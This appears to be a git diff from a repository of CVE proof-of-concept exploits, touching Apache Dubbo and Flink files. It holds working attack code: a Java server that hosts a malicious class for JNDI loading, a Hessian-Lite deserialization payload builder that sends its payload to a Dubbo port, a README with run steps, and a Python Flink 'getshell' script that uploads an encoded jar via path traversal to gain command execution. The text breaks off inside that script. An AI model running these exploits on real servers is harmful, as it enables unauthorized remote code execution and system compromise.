filePath)); - - byte[] bytes = Files.toByteArray(new File("D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class")); - System.out.println(new String(bytes, 0, bytes.length)); - // send response - responseBody.write(bytes); - responseBody.close(); - } - } - } +import com.google.common.io.Files; +import com.sun.net.httpserver.Headers; +import com.sun.net.httpserver.HttpExchange; +import com.sun.net.httpserver.HttpHandler; +import com.sun.net.httpserver.HttpServer; +import com.sun.net.httpserver.spi.HttpServerProvider; +import java.io.BufferedReader; +import java.io.File; +import java.io.IOException; +import java.io.InputStreamReader; +import java.io.OutputStream; +import java.net.InetSocketAddress; +import java.util.Iterator; +import java.util.List; +import java.util.Set; +import org.apache.commons.lang3.StringUtils; + +/** + * 解析http协议,输出http请求体 + * + * @author xuanyh + */ +public class HTTPServer { + + public static String filePath; + public static int PORT = 8080; + public static String contentType; + + public static void main(String[] args) throws IOException { + run(args); + } + + public static void run(String[] args) { + int port = PORT; + String context = "/"; + String clazz = "Calc.class"; + if (args != null && args.length > 0) { + port = Integer.parseInt(args[0]); + context = args[1]; + clazz = args[2]; + } + HttpServerProvider provider = HttpServerProvider.provider(); + HttpServer httpserver = null; + try { + httpserver = provider.createHttpServer(new InetSocketAddress(port), 100); + } catch (IOException e) { + e.printStackTrace(); + } + //监听端口8080, + + httpserver.createContext(context, new RestGetHandler(clazz)); + httpserver.setExecutor(null); + httpserver.start(); + System.out.println("server started"); + } + + static class RestGetHandler implements HttpHandler { + + private String clazz; + + public RestGetHandler(String clazz) { + this.clazz = clazz; + } + + @Override + public void handle(HttpExchange he) throws IOException { + String requestMethod = he.getRequestMethod(); + System.out.println(requestMethod + " " + he.getRequestURI().getPath() + ( + StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? "" + : "?" + he.getRequestURI().getRawQuery()) + " " + he.getProtocol()); + if (requestMethod.equalsIgnoreCase("GET")) { + Headers responseHeaders = he.getResponseHeaders(); + responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType); + + he.sendResponseHeaders(200, 0); + // parse request + OutputStream responseBody = he.getResponseBody(); + Headers requestHeaders = he.getRequestHeaders(); + Set keySet = requestHeaders.keySet(); + Iterator iter = keySet.iterator(); + + while (iter.hasNext()) { + String key = iter.next(); + List values = requestHeaders.get(key); + String s = key + ": " + values.toString(); + System.out.println(s); + } + System.out.println(); + BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody())); + StringBuilder stringBuilder = new StringBuilder(); + String line; + for (;(line = bufferedReader.readLine()) != null;) { + stringBuilder.append(line); + } + System.out.println(stringBuilder.toString()); + +// byte[] bytes = Files.toByteArray(new File(filePath == null ? HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath)); + + byte[] bytes = Files.toByteArray(new File("D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class")); + System.out.println(new String(bytes, 0, bytes.length)); + // send response + responseBody.write(bytes); + responseBody.close(); + } + } + } } \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java index 04f8ed45f19ec0a78a4a98512438a990b0edff8a..0f0eddc9aca91d2dc71ee145bb1a5013e9cf3fb2 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java @@ -1,133 +1,133 @@ -package com.bitterz.dubbo; - -import com.alibaba.com.caucho.hessian.io.Hessian2Output; -import org.apache.dubbo.common.io.Bytes; -import org.apache.xbean.naming.context.ContextUtil; -import org.apache.xbean.naming.context.WritableContext; -import sun.reflect.ReflectionFactory; - -import javax.naming.Context; -import javax.naming.Reference; -import java.io.ByteArrayOutputStream; -import java.io.OutputStream; -import java.lang.reflect.Constructor; -import java.lang.reflect.Field; -import java.lang.reflect.InvocationTargetException; -import java.net.Socket; -import java.util.HashSet; -import java.util.Random; -public class HessianLitePoc { - - public static void main(String[] args) throws Exception { - - Context ctx = Reflections.createWithoutConstructor(WritableContext.class); - Reference ref = new Reference("ExecTest", "ExecTest","http://127.0.0.1:8080/"); - ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", ref, ctx); - -// Field fullName = binding.getClass().getSuperclass().getSuperclass().getDeclaredField("fullName"); -// fullName.setAccessible(true); - Reflections.setFieldValue(binding, "fullName", "<<<<<"); -// fullName.set(binding, "<<<<<"); // 方便定位属性值的 - - - - byte [] heder2 = new byte[]{-38, -69, -30, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1}; - //############################################################################################ - // 写入binding - ByteArrayOutputStream binding2bytes = new ByteArrayOutputStream(); - Hessian2Output outBinding = new Hessian2Output(binding2bytes); - outBinding.writeObject(binding); - outBinding.flushBuffer(); - //############################################################################################ - // binding序列化后的byte数组 - byte[] bindingBytes = binding2bytes.toByteArray(); - - // header. - byte[] header = new byte[16]; - // set magic number. - Bytes.short2bytes((short) 0xdabb, header); - // set request and serialization flag. - header[2] = (byte) ((byte) 0x80 | 0x20 | 2); - // set request id. - Bytes.long2bytes(new Random().nextInt(100000000), header, 4); - // 在header中记录 序列化对象 的长度,因为最后一个F被覆盖了,所以要-1 - Bytes.int2bytes(bindingBytes.length*2-1, header, 12); - - // 收集header+binding - ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); - byteArrayOutputStream.write(header); - byteArrayOutputStream.write(bindingBytes); - byte[] bytes = byteArrayOutputStream.toByteArray(); - - //############################################################################################ - // 组装payload = header+binding+binding - byte[] payload = new byte[bytes.length + bindingBytes.length -1]; - for (int i = 0; i < bytes.length; i++) { - payload[i] = bytes[i]; - } - - for (int i = 0; i < bindingBytes.length; i++) { - payload[i + bytes.length-1] = bindingBytes[i]; - } - //############################################################################################ - - // 修改flag的值 - payload[2] = 0x02; - - // 输出字节流的十六进制 - for (int i = 0; i < payload.length; i++) { - System.out.print(String.format("%02X", payload[i]) + " "); - if ((i + 1) % 8 == 0) - System.out.print(" "); - if ((i + 1) % 16 == 0 ) - System.out.println(); - } - System.out.println(); - // 输出byte数组转String - System.out.println(new String(payload,0,payload.length)); -// System.exit(1); - //todo 此处填写被攻击的dubbo服务提供者地址和端口 - Socket socket = new Socket("127.0.0.1", 20880); - OutputStream outputStream = socket.getOutputStream(); - outputStream.write(payload); - outputStream.flush(); - outputStream.close(); - System.out.println("\nsend!!"); - } - - - public static class Reflections{ - public static void setFieldValue(Object obj, String fieldName, Object fieldValue) throws Exception{ - Field field=null; - Class cl = obj.getClass(); - while (cl != Object.class){ - try{ - field = cl.getDeclaredField(fieldName); - if(field!=null){ - break;} - } - catch (Exception e){ - cl = cl.getSuperclass(); - } - } - if (field==null){ - System.out.println(obj.getClass().getName()); - System.out.println(fieldName); - } - field.setAccessible(true); - field.set(obj,fieldValue); - } - - public static T createWithoutConstructor(Class classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { - return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); - } - - public static T createWithConstructor(Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { - Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); - objCons.setAccessible(true); - Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); - sc.setAccessible(true); - return (T) sc.newInstance(consArgs); - } - } +package com.bitterz.dubbo; + +import com.alibaba.com.caucho.hessian.io.Hessian2Output; +import org.apache.dubbo.common.io.Bytes; +import org.apache.xbean.naming.context.ContextUtil; +import org.apache.xbean.naming.context.WritableContext; +import sun.reflect.ReflectionFactory; + +import javax.naming.Context; +import javax.naming.Reference; +import java.io.ByteArrayOutputStream; +import java.io.OutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.net.Socket; +import java.util.HashSet; +import java.util.Random; +public class HessianLitePoc { + + public static void main(String[] args) throws Exception { + + Context ctx = Reflections.createWithoutConstructor(WritableContext.class); + Reference ref = new Reference("ExecTest", "ExecTest","http://127.0.0.1:8080/"); + ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", ref, ctx); + +// Field fullName = binding.getClass().getSuperclass().getSuperclass().getDeclaredField("fullName"); +// fullName.setAccessible(true); + Reflections.setFieldValue(binding, "fullName", "<<<<<"); +// fullName.set(binding, "<<<<<"); // 方便定位属性值的 + + + + byte [] heder2 = new byte[]{-38, -69, -30, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1}; + //############################################################################################ + // 写入binding + ByteArrayOutputStream binding2bytes = new ByteArrayOutputStream(); + Hessian2Output outBinding = new Hessian2Output(binding2bytes); + outBinding.writeObject(binding); + outBinding.flushBuffer(); + //############################################################################################ + // binding序列化后的byte数组 + byte[] bindingBytes = binding2bytes.toByteArray(); + + // header. + byte[] header = new byte[16]; + // set magic number. + Bytes.short2bytes((short) 0xdabb, header); + // set request and serialization flag. + header[2] = (byte) ((byte) 0x80 | 0x20 | 2); + // set request id. + Bytes.long2bytes(new Random().nextInt(100000000), header, 4); + // 在header中记录 序列化对象 的长度,因为最后一个F被覆盖了,所以要-1 + Bytes.int2bytes(bindingBytes.length*2-1, header, 12); + + // 收集header+binding + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + byteArrayOutputStream.write(header); + byteArrayOutputStream.write(bindingBytes); + byte[] bytes = byteArrayOutputStream.toByteArray(); + + //############################################################################################ + // 组装payload = header+binding+binding + byte[] payload = new byte[bytes.length + bindingBytes.length -1]; + for (int i = 0; i < bytes.length; i++) { + payload[i] = bytes[i]; + } + + for (int i = 0; i < bindingBytes.length; i++) { + payload[i + bytes.length-1] = bindingBytes[i]; + } + //############################################################################################ + + // 修改flag的值 + payload[2] = 0x02; + + // 输出字节流的十六进制 + for (int i = 0; i < payload.length; i++) { + System.out.print(String.format("%02X", payload[i]) + " "); + if ((i + 1) % 8 == 0) + System.out.print(" "); + if ((i + 1) % 16 == 0 ) + System.out.println(); + } + System.out.println(); + // 输出byte数组转String + System.out.println(new String(payload,0,payload.length)); +// System.exit(1); + //todo 此处填写被攻击的dubbo服务提供者地址和端口 + Socket socket = new Socket("127.0.0.1", 20880); + OutputStream outputStream = socket.getOutputStream(); + outputStream.write(payload); + outputStream.flush(); + outputStream.close(); + System.out.println("\nsend!!"); + } + + + public static class Reflections{ + public static void setFieldValue(Object obj, String fieldName, Object fieldValue) throws Exception{ + Field field=null; + Class cl = obj.getClass(); + while (cl != Object.class){ + try{ + field = cl.getDeclaredField(fieldName); + if(field!=null){ + break;} + } + catch (Exception e){ + cl = cl.getSuperclass(); + } + } + if (field==null){ + System.out.println(obj.getClass().getName()); + System.out.println(fieldName); + } + field.setAccessible(true); + field.set(obj,fieldValue); + } + + public static T createWithoutConstructor(Class classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); + } + + public static T createWithConstructor(Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + objCons.setAccessible(true); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + sc.setAccessible(true); + return (T) sc.newInstance(consArgs); + } + } } \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md index b47312f306aac28ea8981afbad6fcf560b0032d6..f39e0a8e4b03752ef3db020914fa166386e4a77f 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md @@ -1,5 +1,5 @@ -漏洞描述 - -Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。 -Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击 +漏洞描述 + +Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。 +Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击 编译ExecTest.java,随后在HttpServer.java中修改ExecTest.class的路径,然后执行HttpServer.main方法,最后执行HessianLitePoc.main方法 \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml index faf28d8b6d6d0252ca4fe88fa923903c93239c54..2f25d5eec3f28427bb898b15c91003501b5486a9 100644 --- a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml +++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml @@ -1,20 +1,20 @@ -id: CVE-2021-25641 -source: https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept -info: - name: Dubbo是一个高性能优秀的服务框架。 - severity: CRITICAL - description: | - 每个Apache Dubbo服务器都会设置一个序列化id,告诉客户端它正在使用哪个序列化协议。但是对于 2.7.8 或 2.6.9 之前的 Dubbo 版本,攻击者可以通过篡改字节序码标志(即不遵循服务器的指令)来选择提供程序将使用的序列化 ID。这意味着,如果弱反序列化程序(如 Kryo 和 FST)以某种方式在代码范围内(例如,如果 Kryo 在某种程度上是依赖项的一部分),则未经身份验证的远程攻击者可以告诉提供程序使用弱反序列化程序,然后继续利用它。 - scope-of-influence: - Dubbo 2.5.0 - 2.6.9 - Dubbo 2.7.0 - 2.7.8 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-25641 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-25641 - cwe-id: CWE-502 - cnvd-id: None - kve-id: None +id: CVE-2021-25641 +source: https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept +info: + name: Dubbo是一个高性能优秀的服务框架。 + severity: CRITICAL + description: | + 每个Apache Dubbo服务器都会设置一个序列化id,告诉客户端它正在使用哪个序列化协议。但是对于 2.7.8 或 2.6.9 之前的 Dubbo 版本,攻击者可以通过篡改字节序码标志(即不遵循服务器的指令)来选择提供程序将使用的序列化 ID。这意味着,如果弱反序列化程序(如 Kryo 和 FST)以某种方式在代码范围内(例如,如果 Kryo 在某种程度上是依赖项的一部分),则未经身份验证的远程攻击者可以告诉提供程序使用弱反序列化程序,然后继续利用它。 + scope-of-influence: + Dubbo 2.5.0 - 2.6.9 + Dubbo 2.7.0 - 2.7.8 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-25641 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-25641 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None tags: cve2021, Apache Dubbo \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml index 1ba752b3e75dfa30047abf05aebfe1b231f0d1b6..c37c98d4e8ae33409bf1c15ff8620489ec3bb90a 100644 --- a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml +++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml @@ -1,20 +1,20 @@ -id: CVE-2021-43297 -source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 -info: - name: Dubbo是一个高性能优秀的服务框架。 - severity: CRITICAL - description: | - Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中,在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发远程代码执行。 - scope-of-influence: - Dubbo Hessian-Lite ≤ 3.2.11 - reference: - - https://help.aliyun.com/document_detail/390193.html - - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-43297 - cwe-id: CWE-502 - cnvd-id: None - kve-id: None +id: CVE-2021-43297 +source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 +info: + name: Dubbo是一个高性能优秀的服务框架。 + severity: CRITICAL + description: | + Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中,在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发远程代码执行。 + scope-of-influence: + Dubbo Hessian-Lite ≤ 3.2.11 + reference: + - https://help.aliyun.com/document_detail/390193.html + - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-43297 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None tags: cve2021, 数据泄漏 \ No newline at end of file diff --git a/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py old mode 100755 new mode 100644 index c78850f56052de474bf975d7cd34e6fa95663b89..d3d4caa32e1494b672977b4f9f319e9b89d51fa4 --- a/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py +++ b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py @@ -1,30 +1,30 @@ -import requests -import base64 -import json -import sys -import cStringIO -#jar_code="UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA" -def main(): - if len(sys.argv) == 1 or sys.argv[1] == '-h': - print('Usage :python2 flink-getshell.py http://example.com:8081') - exit() - url = sys.argv[1] - jobmanager_config_dir = url + '/jobmanager/config' - upload_jar_url = url + "/jars/upload" - r1 = requests.get(jobmanager_config_dir,verify=False) - #data = json.loads(req.text)[2]['value'] - data = json.loads(r1.text) - for i in data: - #print(i['key']) - if i['key'] == "web.tmpdir": - flink_webdir = i['value'] - print("webdir:%s" % flink_webdir) - file_content = base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA') - files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')} - r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False) - print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url) - -if __name__ == "__main__": - main() - - +import requests +import base64 +import json +import sys +import cStringIO +#jar_code="UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA" +def main(): + if len(sys.argv) == 1 or sys.argv[1] == '-h': + print('Usage :python2 flink-getshell.py http://example.com:8081') + exit() + url = sys.argv[1] + jobmanager_config_dir = url + '/jobmanager/config' + upload_jar_url = url + "/jars/upload" + r1 = requests.get(jobmanager_config_dir,verify=False) + #data = json.loads(req.text)[2]['value'] + data = json.loads(r1.text) + for i in data: + #print(i['key']) + if i['key'] == "web.tmpdir": + flink_webdir = i['value'] + print("webdir:%s" % flink_webdir) + file_content = 